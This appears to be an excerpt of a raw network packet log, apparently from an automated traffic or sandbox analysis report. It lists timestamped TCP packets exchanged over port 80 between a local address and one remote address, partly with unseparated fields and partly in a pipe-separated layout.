                            Apr 12, 2021 17:06:03.284181118 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284193039 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284252882 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284259081 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284267902 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284284115 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284321070 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284352064 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284365892 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284413099 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284425020 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284446001 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284509897 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284509897 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284523010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284542084 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284584045 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284590960 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284627914 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284647942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284657001 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284679890 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284714937 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284746885 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284769058 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284791946 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284797907 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284804106 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284830093 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284830093 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284842014 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284859896 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284864902 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284924984 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284930944 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284953117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284982920 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285012960 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285032988 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285042048 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285068035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285072088 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285094976 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285100937 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285115957 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285139084 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285171986 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285196066 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285224915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285254002 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285278082 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285290003 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285311937 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285322905 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285350084 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285357952 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285378933 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285393000 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285401106 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285406113 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285418987 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285423040 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285435915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285454035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285460949 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285465956 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285495043 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285507917 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285515070 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285527945 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285556078 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285588980 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285619974 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285648108 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285675049 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.285762072 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.285778999 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.286505938 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.416930914 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417079926 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417141914 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417191982 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417207956 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417228937 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417241096 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417259932 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417526007 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417592049 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417634964 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417668104 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417674065 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.417727947 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.417749882 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418044090 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418083906 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418131113 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418147087 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418159008 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418176889 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418215990 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418253899 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418258905 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418275118 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418281078 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418293953 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418332100 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418370008 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418391943 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418407917 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418411016 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418415070 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418421030 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418458939 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418502092 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418526888 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418536901 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418550968 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418591022 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418622017 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418627977 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418631077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418653011 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418665886 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418704033 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418730021 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418742895 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418747902 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418751955 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418795109 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418837070 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418849945 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418874979 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418858051 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418914080 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418931961 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418952942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.418962002 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418968916 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.418989897 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419028044 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419044018 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419059992 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419065952 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419069052 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419112921 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419145107 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419156075 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419194937 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419212103 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419226885 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419234037 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419234037 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419274092 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419311047 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419336081 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419343948 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419349909 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419375896 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419388056 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419434071 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419465065 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419476032 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419476032 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419482946 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419514894 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419555902 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419570923 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419593096 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419610977 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419622898 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419630051 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.419639111 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.419682026 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.421014071 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.547964096 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.548039913 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.548094034 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.548146009 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.548202991 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.548235893 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.548261881 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.548310041 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.548321962 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.548329115 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.548337936 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.548372984 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.548388958 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.548482895 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553132057 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553195000 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553257942 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553257942 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553277016 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553317070 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553318977 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553378105 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553380966 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553489923 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553500891 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553559065 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553565025 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553620100 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553653002 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553673983 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553730965 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553740978 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553749084 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553790092 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553817987 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553854942 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553915024 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553925037 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553934097 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.553970098 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.553976059 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554028988 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554059029 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554086924 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554115057 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554143906 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554153919 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554203033 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554259062 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554265022 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554277897 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554323912 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554332972 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554384947 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554425955 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554440022 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554445982 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554497957 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554512978 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554550886 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554557085 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554616928 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554646015 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554672956 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554702044 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554729939 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554761887 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554783106 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554792881 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554855108 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554887056 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554910898 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554968119 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.554969072 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.554992914 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555023909 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555033922 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555079937 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555109978 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555119038 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555135965 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555192947 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555200100 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555258989 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555289984 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555320024 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555375099 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555383921 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555396080 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555432081 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555464029 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555491924 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.555569887 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.555583954 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.557766914 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680246115 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680319071 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680375099 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680432081 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680481911 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680489063 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680510044 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680516958 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680547953 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680555105 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680618048 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680649996 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680679083 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680702925 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680737972 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680790901 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680798054 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680798054 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680859089 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680883884 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680913925 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680969954 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.680979967 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.680988073 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681025982 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681051016 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681090117 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681149960 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681168079 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681176901 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681205988 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681227922 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681262970 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681318998 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681325912 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681338072 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681376934 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681416035 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681468010 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681507111 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681526899 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681561947 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681575060 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681586027 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681644917 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681700945 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
